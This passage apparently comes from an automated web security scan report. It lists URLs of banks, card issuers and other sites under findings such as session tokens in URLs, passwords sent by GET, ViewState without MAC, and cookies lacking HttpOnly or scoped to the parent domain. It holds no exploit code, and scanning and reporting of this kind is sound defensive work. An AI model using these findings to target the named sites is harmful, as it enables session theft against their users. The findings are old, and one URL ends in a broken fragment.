6.172. https://www.wellsfargo.com/wachovia/autoloans/index

6.173. https://www.wellsfargo.com/wachovia/insurance

6.174. https://www.wellsfargo.com/wachovia/wealthmanagement/index

6.175. https://www.wellsfargo.com/wf/product/apply

6.176. https://www.wellsfargo.com/wfonline/

6.177. https://www.wellsfargo.com/wfonline/bill_pay/

7. Session token in URL

7.1. http://textchat.bankofamerica.com/hc/44850650/

7.2. http://visa.via.infonow.net/usa_atm/

7.3. http://www.arbornetworks.com/contact

7.4. http://www.arbornetworks.com/en/partnership-inquiry-form.html

7.5. https://www.bankofamerica.com/credit-cards/cardoverview.action

7.6. http://www.facebook.com/extern/login_status.php

7.7. http://www.kansascity.com/2011/01/10/2573323/earthtalk-are-atlantic-bluefin.html

7.8. http://www.lokeshdhakar.com/

8. Password field submitted using GET method

8.1. http://fis.com/fis/worldnews/worldnews.asp

8.2. http://www.boston.com/yourtown/news/north_end/2011/01/fishers_fight_claims_that_blue.html

8.3. http://www.fis.com/fis/worldnews/worldnews.asp

9. ASP.NET ViewState without MAC enabled

9.1. http://www.merrilledge.com/m/pages/self-directed-investing.aspx

9.2. http://www.merrilledge.com/m/pages/zero-dollar-trades.aspx

9.3. https://www.merrilledge.com/m/pages/home.aspx

9.4. https://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx

10. Cookie scoped to parent domain

10.1. https://chaseonline.chase.com/

10.2. http://food.change.org/blog/view/bluefin_brigade_to_the_rescue

10.3. http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi

10.4. https://online.cardmemberservices.com/

10.5. http://online.wsj.com/article/SB10001424052748703779704576073610615364334.html

10.6. http://online.wsj.com/article/SB10001424052748703956604576110453371369740.html

10.7. https://onlineservices.wachovia.com/auth/AuthService

10.8. https://pncpoints.visaextras.com/

10.9. http://www.cualn.com/members/stepthree

10.10. http://www.directstartv.com/

10.11. http://www.forum-software.org/tag/ipboard

10.12. http://www.macaudailytimes.com.mo/cron_image.html

10.13. http://www.macaudailytimes.com.mo/imagecode.html

10.14. http://www.macaudailytimes.com.mo/js/lang.php

10.15. http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html

10.16. http://www.opensource.org/licenses/gpl-license.php

10.17. http://www.opensource.org/licenses/mit-license.php

10.18. http://a.tribalfusion.com/j.ad

10.19. http://ads.adbrite.com/adserver/vdi/762701

10.20. https://adwords.google.com/select/Login

10.21. http://affiliate.invisionpower.com/scripts/track.php

10.22. http://api.viglink.com/api/ping

10.23. http://blogsearch.google.com/

10.24. http://books.google.com/bkshp

10.25. http://books.google.com/books

10.26. http://bs.serving-sys.com/BurstingPipe/adServer.bs

10.27. https://chaseonline.chase.com/auth/login.aspx

10.28. https://chaseonline.chase.com/chaseonline/reidentify/sso_reidentify.jsp

10.29. https://chaseonline.chase.com/js/Reporting.js

10.30. http://code.google.com/p/swfobject/

10.31. http://groups.google.com/groups

10.32. http://groups.google.com/grphp

10.33. http://id.google.com/verify/EAAAAG9kfZvLTzdTC1gh7mvNeo8.gif

10.34. http://image2.pubmatic.com/AdServer/Pug

10.35. http://jpmorganchase.112.2o7.net/b/ss/jpmcglobal,jpmorgan/1/H.21/s3515906694345

10.36. http://leadback.advertising.com/adcedge/lb

10.37. http://maps.google.com/maps

10.38. http://maps.google.com/maps/place

10.39. http://maps.yahoo.com/set_beta

10.40. https://online.wellsfargo.com/signon

10.41. http://picasaweb.google.com/lh/view

10.42. https://picasaweb.google.com/home

10.43. https://picasaweb.google.com/lh/view

10.44. http://pixel.quantserve.com/pixel

10.45. http://r.turn.com/r/beacon

10.46. https://resources.cardmemberservices.com/MyAccounts.aspx

10.47. https://resources.chase.com/MyAccounts.aspx

10.48. http://s.xp1.ru4.com/meta

10.49. https://s.xp1.ru4.com/meta

10.50. https://sitekey.bankofamerica.com/sas/resetIDScreen.do

10.51. https://sitekey.bankofamerica.com/sas/resetPasscodeScreen.do

10.52. https://sitekey.bankofamerica.com/sas/signon.do

10.53. http://solutions.liveperson.com/ref/lppb.asp

10.54. http://stg.xp1.ru4.com/meta

10.55. https://stg.xp1.ru4.com/meta

10.56. http://tc.bankofamerica.com/i

10.57. https://tc.bankofamerica.com/c

10.58. http://translate.google.com/

10.59. http://translate.google.com/translate_t

10.60. http://usa.visa.com/

10.61. http://video.google.com/

10.62. http://www.abc.net.au/news/stories/2011/01/20/3117032.htm

10.63. http://www.abc.net.au/rural/news/content/201102/s3126694.htm

10.64. http://www.bankofamerica.com/creditcards/index.cfm

10.65. http://www.bankofamerica.com/help/

10.66. http://www.bankofamerica.com/help/index.cfm

10.67. https://www.bankofamerica.com/

10.68. https://www.bankofamerica.com/credit-cards/cardoverview.action

10.69. https://www.bankofamerica.com/homepage/overview.go

10.70. https://www.bankofamerica.com/homepage/stateSelect.go

10.71. https://www.bankofamerica.com/myexpression_banking/

10.72. https://www.bankofamerica.com/retirementcenter

10.73. https://www.bankofamerica.com/retirementcenter/

10.74. http://www.capitalone.com/about/

10.75. http://www.capitalone.com/autoloans/

10.76. http://www.capitalone.com/autoloans/auto-loan-calculator.php

10.77. http://www.capitalone.com/autoloans/index.php

10.78. http://www.capitalone.com/autoloans/lp/auto-loans-pict.php

10.79. http://www.capitalone.com/autoloans/refinance/

10.80. http://www.capitalone.com/bank/commercial/

10.81. http://www.capitalone.com/bank/homeloansandmortgages/home-loan-assistance/legacy-ccb/index.php

10.82. http://www.capitalone.com/capitaloneplace/disclosures.php

10.83. http://www.capitalone.com/careers/

10.84. http://www.capitalone.com/checking-accounts/

10.85. http://www.capitalone.com/contactus/

10.86. http://www.capitalone.com/contactus/faq.php

10.87. http://www.capitalone.com/contactus/olbsupport.php

10.88. http://www.capitalone.com/creditcards/

10.89. http://www.capitalone.com/creditcards/products/browse-all/

10.90. http://www.capitalone.com/creditcards/products/browse-all/popular/

10.91. http://www.capitalone.com/directbanking/

10.92. http://www.capitalone.com/directbanking/online-certificates-deposit/

10.93. http://www.capitalone.com/directbanking/online-checking-accounts/interest-online-checking-account/

10.94. http://www.capitalone.com/directbanking/online-savings-accounts/

10.95. http://www.capitalone.com/directbanking/online-savings-accounts/high-yield-money-market-account/

10.96. http://www.capitalone.com/directbanking/online-savings-accounts/interestplus-online-savings-account/

10.97. http://www.capitalone.com/directbanking/online-savings-accounts/rewards-money-market-account/index.php

10.98. http://www.capitalone.com/financialeducation/

10.99. http://www.capitalone.com/financialeducation/creditcardact/index.php

10.100. http://www.capitalone.com/fraud/prevention/index.php

10.101. http://www.capitalone.com/loans/

10.102. http://www.capitalone.com/onlinebanking/overview.php

10.103. http://www.capitalone.com/personalloans/

10.104. http://www.capitalone.com/protection/privacy/index.php

10.105. http://www.capitalone.com/protection/security/index.php

10.106. http://www.capitalone.com/redirect.php

10.107. http://www.capitalone.com/rewards/index.php

10.108. http://www.capitalone.com/rewards/service-login.php

10.109. http://www.capitalone.com/sitemap/

10.110. http://www.capitalone.com/smallbusiness/

10.111. http://www.capitalone.com/smallbusiness/business-money-market/

10.112. http://www.capitalone.com/smallbusiness/cards/

10.113. http://www.capitalone.com/smallbusiness/cards/index.php

10.114. http://www.capitalone.com/smallbusiness/payroll/

10.115. https://www.capitalone.com/

10.116. https://www.capitalone.com/creditcards/gateway/

10.117. https://www.capitalone.com/scripts/thirdparty/xplus1/xp1vars.js.php

10.118. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html

10.119. https://www.chase.com/

10.120. https://www.chase.com/wamuwelcome3/

10.121. http://www.chasestudentloans.com/studentloans

10.122. http://www.facebook.com/2008/fbml

10.123. http://www.facebook.com/campaign/landing.php

10.124. http://www.firstusa.com/xcards4/common/weblinking/weblinking.html

10.125. http://www.google.com/finance

10.126. http://www.google.com/setprefs

10.127. http://www.grist.org/article/food-2011-01-11-boycotting-bluefin-isnt-enough-time-to-turn-on-the-siren

10.128. http://www.guardian.co.uk/business/2011/jan/11/offshore-oil-industry-white-house

10.129. http://www.ibsnetaccess.com/

10.130. http://www.merrilledge.com/m/pages/self-directed-investing.aspx

10.131. http://www.merrilledge.com/m/pages/zero-dollar-trades.aspx

10.132. https://www.merrilledge.com/m/pages/home.aspx

10.133. https://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx

10.134. https://www.mystreetscape.com/my/charteroneinvest

10.135. https://www.mystreetscape.com/my/citizensinvest

10.136. https://www.onlinebanking.pnc.com/alservlet/ForgotUserIdServlet

10.137. https://www.onlinebanking.pnc.com/alservlet/OnlineBankingServlet

10.138. http://www.retirement.merrilledge.com/IRA/pages/home.aspx

10.139. http://www.totalmerrill.com/TotalMerrill/pages/home.aspx

10.140. http://www.viglink.com/

10.141. http://www.wachovia.com/

10.142. http://www.wcti12.com/news/26551757/detail.html

10.143. http://www.wellsfargo.com/

10.144. https://www.wellsfargo.com/

10.145. https://www.wellsfargo.com/about/diversity/

10.146. https://www.wellsfargo.com/autoloans/

10.147. https://www.wellsfargo.com/autoloans/apply

10.148. https://www.wellsfargo.com/browser/jaws_setting

10.149. https://www.wellsfargo.com/careers/

10.150. https://www.wellsfargo.com/checking/

10.151. https://www.wellsfargo.com/com/comintro

10.152. https://www.wellsfargo.com/credit_cards/

10.153. https://www.wellsfargo.com/credit_cards/select_card

10.154. https://www.wellsfargo.com/equity/

10.155. https://www.wellsfargo.com/equity/rate_payments/information/rate_calc

10.156. https://www.wellsfargo.com/help/

10.157. https://www.wellsfargo.com/help/faqs/signon_faqs

10.158. https://www.wellsfargo.com/help/services

10.159. https://www.wellsfargo.com/insurance/

10.160. https://www.wellsfargo.com/insurance/id_credit_protection/idtheft

10.161. https://www.wellsfargo.com/investing/hsa/enroll

10.162. https://www.wellsfargo.com/investing/investmentservices/

10.163. https://www.wellsfargo.com/investing/more

10.164. https://www.wellsfargo.com/investing/mutual_funds/

10.165. https://www.wellsfargo.com/investing/retirement/

10.166. https://www.wellsfargo.com/investing/retirement/openira/

10.167. https://www.wellsfargo.com/jump/about/fdic

10.168. https://www.wellsfargo.com/jump/applications/inprogress

10.169. https://www.wellsfargo.com/jump/wachovia/EFS/WAC1

10.170. https://www.wellsfargo.com/jump/wachovia/insurance/identity

10.171. https://www.wellsfargo.com/jump/wachovia/mortgage/firsttimebuyer

10.172. https://www.wellsfargo.com/locator/atm/preSearch

10.173. https://www.wellsfargo.com/locator/atm/search

10.174. https://www.wellsfargo.com/mortgage/

10.175. https://www.wellsfargo.com/mortgage/rates

10.176. https://www.wellsfargo.com/online_brokerage/education/trading/volatile/

10.177. https://www.wellsfargo.com/per/more/banking

10.178. https://www.wellsfargo.com/per/more/loans_credit

10.179. https://www.wellsfargo.com/personal_credit/

10.180. https://www.wellsfargo.com/personal_credit/rate_payments/rate_calc_main

10.181. https://www.wellsfargo.com/privacy_security/

10.182. https://www.wellsfargo.com/privacy_security/fraud/

10.183. https://www.wellsfargo.com/privacy_security/fraud/report/

10.184. https://www.wellsfargo.com/privacy_security/fraud/report/fraud

10.185. https://www.wellsfargo.com/privacy_security/online/guarantee

10.186. https://www.wellsfargo.com/products_services/HE_selector

10.187. https://www.wellsfargo.com/products_services/applications_viewall

10.188. https://www.wellsfargo.com/products_services/brokerage_cklist

10.189. https://www.wellsfargo.com/products_services/deposit_cklist

10.190. https://www.wellsfargo.com/products_services/pll_select

10.191. https://www.wellsfargo.com/rates/rates_viewall

10.192. https://www.wellsfargo.com/savings_cds/

10.193. https://www.wellsfargo.com/savings_cds/apply

10.194. https://www.wellsfargo.com/savings_cds/cds

10.195. https://www.wellsfargo.com/search/search

10.196. https://www.wellsfargo.com/sitemap

10.197. https://www.wellsfargo.com/student/

10.198. https://www.wellsfargo.com/student/loans/apply

10.199. https://www.wellsfargo.com/tas

10.200. https://www.wellsfargo.com/theprivatebank/

10.201. https://www.wellsfargo.com/wachovia

10.202. https://www.wellsfargo.com/wachovia/

10.203. https://www.wellsfargo.com/wachovia/autoloans/index

10.204. https://www.wellsfargo.com/wachovia/insurance

10.205. https://www.wellsfargo.com/wachovia/wealthmanagement/index

10.206. https://www.wellsfargo.com/wf/product/apply

10.207. https://www.wellsfargo.com/wfonline/

10.208. https://www.wellsfargo.com/wfonline/bill_pay/

10.209. http://www.youtube.com/

10.210. http://www.youtube.com/results

10.211. http://www.youtube.com/watch

10.212. https://www2.bankofamerica.com/promos/jump/greatdeals/

10.213. https://www6.bankofamerica.com/planning/investments.action

11. Cookie without HttpOnly flag set

11.1. http://careers.bankofamerica.com/overview/overview.asp

11.2. http://careers.jpmorganchase.com/career/careerhome

11.3. https://chaseonline.chase.com/

11.4. http://chat.livechatinc.net/licence/1043255/script.cgi

11.5. http://corporate.visa.com/

11.6. http://data.coremetrics.com/cm

11.7. http://fis.com/fis/worldnews/worldnews.asp

11.8. http://icg.citi.com/icg/global_banking/index.jsp

11.9. http://icg.citi.com/icg/global_markets/index.jsp

11.10. http://insidejapantours.com/japan-news/1671/tuna-costs-254-000-in-japan/

11.11. http://ipboard-software.software.informer.com/

11.12. http://learn.bankofamerica.com/

11.13. http://locators.bankofamerica.com/locator/gen3loc/

11.14. http://locators.bankofamerica.com/locator/locator/LocatorAction.do

11.15. http://lovely-faces.com/

11.16. http://m.usa.visa.com/m/assistance/access.jsp

11.17. http://m.usa.visa.com/m/assistance/contact.jsp

11.18. http://m.usa.visa.com/m/assistance/index.jsp

11.19. http://m.usa.visa.com/m/assistance/lost.jsp

11.20. http://m.usa.visa.com/m/cards/buxx.jsp

11.21. http://m.usa.visa.com/m/cards/credit.jsp

11.22. http://m.usa.visa.com/m/cards/debit.jsp

11.23. http://m.usa.visa.com/m/cards/gift.jsp

11.24. http://m.usa.visa.com/m/cards/index.jsp

11.25. http://m.usa.visa.com/m/cards/prepaid.jsp

11.26. http://m.usa.visa.com/m/cards/readylink.jsp

11.27. http://m.usa.visa.com/m/cards/travelmoney.jsp

11.28. http://m.usa.visa.com/m/discounts/index.jsp

11.29. http://m.usa.visa.com/m/index.jsp

11.30. http://m.usa.visa.com/m/legal.jsp

11.31. https://militarybankonline.bankofamerica.com/efs/servlet/military/login.jsp

11.32. https://myaccountsaws.navyfcu.org/mfnfopwd/

11.33. https://online.cardmemberservices.com/

11.34. http://online.wsj.com/article/SB10001424052748703779704576073610615364334.html

11.35. http://online.wsj.com/article/SB10001424052748703956604576110453371369740.html

11.36. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp

11.37. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp

11.38. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp

11.39. http://query.jpmorgan.com/inetSearch/index.jsp

11.40. http://search.wachovia.com/selfservice/microsites/wachoviaSearchEntry.do

11.41. http://search.wareseeker.com/ip-board/

11.42. https://secure.opinionlab.com/ccc01/comment_card.asp

11.43. https://secure.opinionlab.com/rate36s.asp

11.44. https://sitekey.bankofamerica.com/sas/resetIDScreen.do

11.45. https://sitekey.bankofamerica.com/sas/resetPasscodeScreen.do

11.46. https://sitekey.bankofamerica.com/sas/signon.do

11.47. http://smallbusinessonlinecommunity.bankofamerica.com/

11.48. http://sofa.bankofamerica.com/eluminate

11.49. http://solutions.liveperson.com/ref/lppb.asp

11.50. https://support01.arbornetworks.com/

11.51. http://thehill.com/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more

11.52. http://twitter.com/PracticalMoney

11.53. http://twitter.com/navyfederalnews

11.54. http://usa.visa.com/cardadvisor/CardAdvisor

11.55. http://usa.visa.com/personal/account-inquiries/card_providers.jsp

11.56. http://usa.visa.com/personal/discounts/index.jsp

11.57. http://usa.visa.com/personal/security/identity_theft_search.jsp

11.58. http://usa.visa.com/personal/student/index.jsp

11.59. http://usa.visa.com/personal/visa_brings_you/mytaxrefund.jsp

11.60. http://usa.visa.com/specialOffers/AOLVisaOffers/offers.jsp

11.61. http://usa.visa.com/specialOffers/CMS/offers.jsp

11.62. http://usa.visa.com/specialOffers/Yahoo/offers.jsp

11.63. https://usa.visa.com/signaturesouthwest/index.jsp

11.64. https://usa.visa.com/specialOffers/FUSA_Amazon/offers.jsp

11.65. http://visa.com/

11.66. http://visa.com/

11.67. http://visa.via.infonow.net/usa_atm/

11.68. http://visasignature.mobi/

11.69. https://www.1sttools.com/loginout/login.asp

11.70. https://www.accessmycardonline.com/RBS_Consumer/SecuredLogin.do

11.71. http://www.arbornetworks.com/report

11.72. http://www.asual.com/swfaddress/

11.73. http://www.bankofamerica.com/creditcards/index.cfm

11.74. http://www.bankofamerica.com/help/

11.75. http://www.bankofamerica.com/help/equalhousing_popup.cfm

11.76. http://www.bankofamerica.com/index.cfm

11.77. http://www.bankofamerica.com/weblinking/

11.78. https://www.bankofamerica.com/

11.79. https://www.bankofamerica.com/Control.do

11.80. https://www.bankofamerica.com/credit-cards/cardoverview.action

11.81. https://www.bankofamerica.com/deposits/index.action

11.82. https://www.bankofamerica.com/homepage/WidgetAction.go

11.83. https://www.bankofamerica.com/homepage/overview.go

11.84. https://www.bankofamerica.com/homepage/stateSelect.go

11.85. https://www.bankofamerica.com/hub/index.action

11.86. https://www.bankofamerica.com/myexpression_banking/

11.87. https://www.bankofamerica.com/planning/

11.88. https://www.bankofamerica.com/planning/investments.action

11.89. https://www.bankofamerica.com/privacy/Control.do

11.90. https://www.bankofamerica.com/privacy/index.jsp

11.91. https://www.bankofamerica.com/retirementcenter/

11.92. https://www.bankofamerica.com/search/Search.do

11.93. https://www.bankofamerica.com/sitemap/index.action

11.94. https://www.bankofamerica.com/smallbusiness/index.jsp

11.95. http://www.capitalone.com/about/

11.96. http://www.capitalone.com/smallbusiness/

11.97. http://www.capitalone.com/smallbusiness/business-money-market/

11.98. http://www.capitalone.com/smallbusiness/cards/

11.99. http://www.capitalone.com/smallbusiness/cards/index.php

11.100. http://www.capitalone.com/smallbusiness/payroll/

11.101. https://www.chase.com/MilitaryLendingProgram

11.102. https://www.chase.com/ccp/index.jsp

11.103. https://www.chase.com/chf/mortgage/om_chasecom_redirect

11.104. https://www.chase.com/framework/skeletons/psmgenskel

11.105. https://www.chase.com/framework/skins/psmgenskin

11.106. https://www.chase.com/framework/skins/psmgenskin/images

11.107. https://www.chase.com/index.jsp

11.108. https://www.chase.com/online/logon/on_successful_logon.jsp

11.109. http://www.citi.com/domain/index.jsp

11.110. http://www.citi.com/domain/scripts/config.jsp

11.111. http://www.citi.com/search/advanced.jsp

11.112. http://www.citi.com/search/results.jsp

11.113. https://www.citibank.com/us/cards/index.jsp

11.114. http://www.cualn.com/members/stepthree

11.115. http://www.directstartv.com/

11.116. http://www.emagazine.com/view/

11.117. https://www.esp01.pnc.com/LaunchPad/dflt/Login.pncadv

11.118. http://www.fdic.gov/

11.119. http://www.firstnational.com/

11.120. http://www.firstnational.com/config/html/en/searchresults.asp

11.121. http://www.firstnational.com/config/html/en/setcookie.asp

11.122. http://www.firstnationalinvestmentsandplanning.com/

11.123. http://www.fis.com/fis/worldnews/worldnews.asp

11.124. http://www.forum-software.org/tag/ipboard

11.125. http://www.grist.org/article/food-2011-01-11-boycotting-bluefin-isnt-enough-time-to-turn-on-the-siren

11.126. https://www.ibsnetaccess.com/NASApp/NetAccess/AboutDisplay

11.127. https://www.ibsnetaccess.com/NASApp/NetAccess/ContactsDisplay

11.128. https://www.ibsnetaccess.com/NASApp/NetAccess/DisplayScreen

11.129. https://www.ibsnetaccess.com/NASApp/NetAccess/LoginDisplay

11.130. https://www.ibsnetaccess.com/NASApp/NetAccess/LoginValidation

11.131. https://www.ibsnetaccess.com/NASApp/NetAccess/PreAuthentication

11.132. https://www.ibsnetaccess.com/NASApp/NetAccess/TermsOfUseDisplay

11.133. https://www.ibsnetaccess.com/NASApp/NetAccess/popupAction.action

11.134. http://www.journalpioneer.com/News/Local/2011-02-01/article-2189851/Premiers-Cup-goes-to-Northport-fisher/1

11.135. http://www.jpmorgan.com/cm/Satellite

11.136. http://www.jpmorgan.com/pages/jpmorgan

11.137. http://www.jpmorgan.com/pages/jpmorgan/home/business

11.138. http://www.jpmorgan.com/pages/jpmorgan/home/corporations

11.139. http://www.jpmorgan.com/pages/jpmorgan/home/fi

11.140. http://www.jpmorgan.com/pages/jpmorgan/home/individuals

11.141. http://www.jpmorgan.com/pages/jpmorgan/home/publicsector

11.142. http://www.macaudailytimes.com.mo/cron_image.html

11.143. http://www.macaudailytimes.com.mo/imagecode.html

11.144. http://www.macaudailytimes.com.mo/js/lang.php

11.145. http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html

11.146. https://www.merchantsummary.com/fnmsonline/fnms_ms_login.asp

11.147. https://www.mystreetscape.com/my/charteroneinvest

11.148. https://www.mystreetscape.com/my/citizensinvest

11.149. http://www.oneofacard.com/generalinfo.asp

11.150. http://www.oneofacard.com/generalinfo.asp

11.151. http://www.oneofacard.com/generalinfo2.asp

11.152. https://www.onlinebanking.pnc.com/alservlet/ForgotUserIdServlet

11.153. https://www.onlinebanking.pnc.com/alservlet/OnlineBankingServlet

11.154. http://www.opensource.org/licenses/gpl-license.php

11.155. http://www.opensource.org/licenses/mit-license.php

11.156. https://www.pnc.com/webapp/sec/Forms.do

11.157. https://www.pnc.com/webapp/sec/ProductsAndService.do

11.158. https://www.pnc.com/webapp/unsec/Blank.do

11.159. https://www.pnc.com/webapp/unsec/Gateway.do

11.160. https://www.pnc.com/webapp/unsec/Homepage.do

11.161. https://www.pnc.com/webapp/unsec/Homepage.do

11.162. https://www.pnc.com/webapp/unsec/NCProductsAndService.do

11.163. https://www.pnc.com/webapp/unsec/ProductsAndService.do

11.164. https://www.pnc.com/webapp/unsec/Solutions.do

11.165. https://www.pnc.com/webapp/unsec/depositRates/init.app

11.166. https://www.pnc.com/webapp/unsec/homeEquity/init.app

11.167. https://www.retirementgold.com/

11.168. https://www.smart-hsa.com/pnc/

11.169. https://www.smart-hsa.com/pnc/

11.170. http://www.thestandard.com.hk/news_detail.asp

11.171. http://www.transactionservices.citigroup.com/transactionservices/home/

11.172. http://www.transactionservices.citigroup.com/transactionservices/home/tts/

11.173. http://www.transunion.com/

11.174. http://www.upi.com/Science_News/2011/01/07/Blue-fin-tuna-sells-for-400000-in-Tokyo/UPI-23331294451264/

11.175. http://www.viglink.com/

11.176. http://www.visa.com/globalgateway/main.jsp

11.177. https://www.wachovia.com/checking

11.178. https://www.wachovia.com/enroll

11.179. https://www.wachovia.com/espanol

11.180. https://www.wachovia.com/foundation/v/index.jsp

11.181. https://www.wachovia.com/helpcenter

11.182. https://www.wachovia.com/home-equity

11.183. https://www.wachovia.com/inside

11.184. https://www.wachovia.com/legal

11.185. https://www.wachovia.com/privacyandsecurity

11.186. https://www.wachovia.com/retirementlogin

11.187. https://www.wachovia.com/savings

11.188. https://www.wachovia.com/savings/featured-cd.html

11.189. https://www.wachovia.com/securityplus

11.190. http://www.webveteran.com/

11.191. https://www.wellsfargo.com/

11.192. https://www4.usbank.com/internetBanking/RequestRouter

11.193. https://www4.usbank.com/internetBanking/RequestRouter

11.194. https://www4.usbank.com/internetBanking/RequestRouter

11.195. https://www4.usbank.com/internetBanking/en_us/info/BrowserRequirementsOut.jsp

11.196. https://www4.usbank.com/internetBanking/en_us/info/BrowserRequirementsOut.jsp

11.197. https://www4.usbank.com/internetBanking/en_us/info/ContactUsOut.jsp

11.198. https://www4.usbank.com/internetBanking/en_us/info/ContactUsOut.jsp

11.199. https://www6.bankofamerica.com/planning/investments.action

11.200. http://a.tribalfusion.com/j.ad

11.201. http://ad.thehill.com/www/delivery/ajs.php

11.202. http://ad.thehill.com/www/delivery/al.php

11.203. http://ad.thehill.com/www/delivery/avw.php

11.204. http://ad.thehill.com/www/delivery/ck.php

11.205. http://ad.thehill.com/www/delivery/lg.php

11.206. http://ad.yieldmanager.com/pixel

11.207. http://ads.adbrite.com/adserver/vdi/762701

11.208. https://adwords.google.com/select/Login

11.209. http://affiliate.invisionpower.com/scripts/track.php

11.210. http://api.viglink.com/api/ping

11.211. http://blogsearch.google.com/

11.212. http://books.google.com/bkshp

11.213. http://books.google.com/books

11.214. http://bs.serving-sys.com/BurstingPipe/adServer.bs

11.215. https://chaseonline.chase.com/auth/login.aspx

11.216. https://chaseonline.chase.com/chaseonline/reidentify/sso_reidentify.jsp

11.217. https://chaseonline.chase.com/js/Reporting.js

11.218. http://citi.bridgetrack.com/a/c/

11.219. http://citi.bridgetrack.com/a/s/

11.220. http://citi.bridgetrack.com/a/s/

11.221. http://citi.bridgetrack.com/track/

11.222. http://code.google.com/p/swfobject/

11.223. http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/

11.224. http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/

11.225. http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/

11.226. http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/

11.227. http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/

11.228. http://community.invisionpower.com/files/

11.229. http://community.invisionpower.com/files/file/3935-sos31-improve-next-previous-issue-links-in-iptracker-v100/

11.230. http://community.invisionpower.com/files/file/3936-ipdownloads-file-version-in-support-topic-title/

11.231. http://community.invisionpower.com/files/file/3937-peace/

11.232. http://community.invisionpower.com/files/file/3938-turkish-turkce-language-pack-for-m31-videos-system-203-public-side/

11.233. http://community.invisionpower.com/files/file/3939-vietnamese-3xx-lang/

11.234. http://community.invisionpower.com/files/file/3940-dp31-ihost/

11.235. http://community.invisionpower.com/files/file/3941-vanilla-valentine/

11.236. http://community.invisionpower.com/files/file/3942-sos31-file-version-in-online-list/

11.237. http://community.invisionpower.com/files/file/3943-speed/

11.238. http://community.invisionpower.com/files/file/3944-ipchat-12-turkish-language-pack/

11.239. http://community.invisionpower.com/index.php

11.240. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/installation-r17

11.241. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514

11.242. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/upgrading-r18

11.243. http://community.invisionpower.com/resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536

11.244. http://community.invisionpower.com/topic/330933-iptracker-200-released/

11.245. http://community.invisionpower.com/topic/330971-ipnexus-113-released/

11.246. http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390

11.247. http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__view__findpost__p__2073390

11.248. http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__view__getlastpost

11.249. http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__view__getnewpost

11.250. http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__view__new

11.251. http://community.invisionpower.com/topic/331075-so-far-disappointed-by-how-far-gallery-4-misses-the-mark/page__view__getlastpost

11.252. http://community.invisionpower.com/topic/331075-so-far-disappointed-by-how-far-gallery-4-misses-the-mark/page__view__getnewpost

11.253. http://community.invisionpower.com/topic/331381-namecheap/page__view__getlastpost

11.254. http://community.invisionpower.com/topic/331381-namecheap/page__view__getnewpost

11.255. http://community.invisionpower.com/topic/331383-convert-to-ipb/page__view__getlastpost

11.256. http://community.invisionpower.com/topic/331383-convert-to-ipb/page__view__getnewpost

11.257. http://community.invisionpower.com/topic/331395-ipnexus-12-dev-update-custom-customer-fields/page__view__getlastpost

11.258. http://community.invisionpower.com/topic/331395-ipnexus-12-dev-update-custom-customer-fields/page__view__getnewpost

11.259. http://community.invisionpower.com/topic/331399-images/page__view__getlastpost

11.260. http://community.invisionpower.com/topic/331399-images/page__view__getnewpost

11.261. http://community.invisionpower.com/topic/331403-custom-home-page/

11.262. http://community.invisionpower.com/topic/331413-my-ipb-site-is-on-the-front-page-of-huffington-post/

11.263. http://community.invisionpower.com/topic/331414-help-please/

11.264. http://community.invisionpower.com/topic/331420-how-to-upgrade/

11.265. http://community.invisionpower.com/topic/331420-how-to-upgrade/page__view__getlastpost

11.266. http://community.invisionpower.com/topic/331420-how-to-upgrade/page__view__getnewpost

11.267. http://community.invisionpower.com/topic/331421-how-to-upgrade/

11.268. http://community.invisionpower.com/topic/331421-how-to-upgrade/page__view__getlastpost

11.269. http://community.invisionpower.com/topic/331421-how-to-upgrade/page__view__getnewpost

11.270. http://community.invisionpower.com/tracker/issue-21358-small-input-field-behavior-issue-after-updating-status/

11.271. http://goto.ext.google.com/og-dogfood-issue

11.272. http://goto.ext.google.com/og-exp

11.273. http://groups.google.com/groups

11.274. http://groups.google.com/grphp

11.275. http://homeloanhelp.bankofamerica.com/en/index.html

11.276. http://image2.pubmatic.com/AdServer/Pug

11.277. http://jpmorganchase.112.2o7.net/b/ss/jpmcglobal,jpmorgan/1/H.21/s3515906694345

11.278. http://jpmorganchase.112.2o7.net/b/ss/jpmcglobal,jpmorgan/1/H.21/s3515906694345

11.279. http://leadback.advertising.com/adcedge/lb

11.280. http://maps.google.com/maps

11.281. http://maps.google.com/maps/place

11.282. http://maps.yahoo.com/set_beta

11.283. https://myaccounts.navyfcu.org/cgi-bin/ifsewwwc

11.284. https://online.wellsfargo.com/signon

11.285. https://onlineservices.wachovia.com/auth/AuthService

11.286. http://pixel.quantserve.com/pixel

11.287. http://promo.bankofamerica.com/paynow/

11.288. http://r.turn.com/r/beacon

11.289. https://resources.cardmemberservices.com/MyAccounts.aspx

11.290. https://resources.chase.com/MyAccounts.aspx

11.291. http://s.xp1.ru4.com/meta

11.292. https://s.xp1.ru4.com/meta

11.293. http://search.aol.com/%20%20%20%20%20%20%20%20%20%20%20%20%201','','0C

